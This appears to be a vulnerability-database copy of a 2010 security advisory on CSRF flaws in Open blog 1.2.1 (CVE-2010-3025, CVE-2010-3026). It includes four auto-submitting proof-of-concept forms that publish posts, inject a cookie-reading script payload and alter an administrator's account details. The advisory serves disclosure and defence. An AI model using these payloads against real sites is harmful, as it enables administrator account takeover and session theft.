Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB22496
HistoryJul 22, 2010 - 12:00 a.m.

Cross-site Request Forgery (CSRF) in Open blog

2010-07-2200:00:00
High-Tech Bridge
www.htbridge.com
24

0.004 Low

EPSS

Percentile

73.0%

JSON

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Open blog which could be exploited to perform cross-site request forgery attacks.

  1. Cross-site request forgery vulnerabilities in Open blog: CVE-2010-3025
    1.1 The vulnerability exists due to insufficient validation of the request origin in application/modules/admin/controllers/posts.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and publish arbitrary posts. Further exploitation might allow arbitrary HTML and script code execution in context of the vulnerable website due to insufficient sanitation of input data in the “excerpt” parameter via admin/posts/edit.
    Exploitation example:
    <form action=“http://host/admin/posts/edit” method=“post” >
    <input type=“hidden” name=“title” value=“Welcome to Open Blog” />
    <input type=“hidden” name=“excerpt” value=‘Some text"><script>alert(document.cookie)</script>’ />
    <input type=“hidden” name=“content” value=“” />
    <input type=“hidden” name=“categories[]” value=“1” />
    <input type=“hidden” name=“tags” value=“openblog” />
    <input type=“hidden” name=“publish_date” value=“13/07/2010” />
    <input type=“hidden” name=“status” value=“published” />
    <input type=“hidden” name=“id” value=“1” />
    <input type=“submit” name=“submit” id=“sbmtit” value=“Edit &rsaquo;&rsaquo;” />
    </form>
    <script>
    document.getElementById(‘sbmtit’).click();
    </script>
    1.2 The vulnerability exists due to insufficient validation of the request origin in application/modules/admin/controllers/pages.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and publish arbitrary posts. Further exploitation might allow arbitrary HTML and script code execution in context of the vulnerable website due to insufficient sanitation of input data in the “content” parameter in via admin/pages/edit.
    Exploitation example:
    <form action=“http://host/admin/pages/edit” method=“post” >
    <input type=“hidden” name=“title” value=“open blog page title” />
    <input type=“hidden” name=“content” value=‘Some page content and <script>alert(document.cookie)</script>’ />
    <input type=“hidden” name=“status” value=“active” />
    <input type=“hidden” name=“id” value=“1” />
    <input type=“submit” name=“submit” id=“sbmtit” value=“Edit &rsaquo;&rsaquo;” />
    </form>
    <script>
    document.getElementById(‘sbmtit’).click();
    </script>
    1.3 The vulnerability exists due to insufficient validation of the request origin in admin/posts/create. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and create arbitrary posts.
    Exploitation example:
    <form action=“http://[host]/admin/posts/create” method=“post” name=“main” />
    <input name=“title” value=“1” type=“hidden” />
    <input name=“excerpt” value=“<p>2</p>” type=“hidden” />
    <input name=“content” value=“<p>3</p>” type=“hidden” />
    <input name=“tags” value=“” type=“hidden” />
    <input name=“publish_date” value=“12/15/2010” type=“hidden” />
    <input name=“status” value=“published” type=“hidden” />
    <input name=“allow_comments” value=“1” type=“hidden” />
    <input name=“categories[]” value=“1” type=“hidden” />
    <input name=“submit” value=“Create” type=“hidden” />
    <input type=“submit” id=“btn” name=“submit” value=“Submit ››”>
    </form>
    <script>
    document.getElementById(‘btn’).click();
    </scri pt>

  2. Cross-site request forgery (CSRF) vulnerability in Open blog: CVE-2010-3026
    The vulnerability exists due to insufficient validation of the request origin in application/modules/admin/controllers/users.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change the administrator`s credentials.
    Exploitation example:
    <form action=“http://host/admin/users/edit” method=“post” >
    <input type=“hidden” name=“display_name” value=“User” />
    <input type=“hidden” name=“level” value=“administrator” />
    <input type=“hidden” name=“email” value="[email protected]" />
    <input type=“hidden” name=“website” value=“” />
    <input type=“hidden” name=“msn_messenger” value=“” />
    <input type=“hidden” name=“jabber” value=“” />
    <input type=“hidden” name=“about_me” value=“about_me” />
    <input type=“hidden” name=“id” value=“2” />
    <input type=“submit” name=“submit” id=“sbmtit” value=“Edit &rsaquo;&rsaquo;” />
    </form>
    <script>
    document.getElementById(‘sbmtit’).click();
    </script>

CPENameOperatorVersion
open blogle1.2.1

Related

prion 2
cve 2
cvelist 2
nvd 2
prion
prion
Cross site scripting
2010-08-16 20:00:00
Cross site request forgery (csrf)
2010-08-16 20:00:00
cve
cve
CVE-2010-3025
2010-08-16 20:00:03
CVE-2010-3026
2010-08-16 20:00:03
cvelist
cvelist
CVE-2010-3025
2010-08-16 19:00:00
CVE-2010-3026
2010-08-16 19:00:00
nvd
nvd
CVE-2010-3025
2010-08-16 20:00:03
CVE-2010-3026
2010-08-16 20:00:03

0.004 Low

EPSS

Percentile

73.0%

JSON
Related for HTB22496
prion2cve2cvelist2nvd2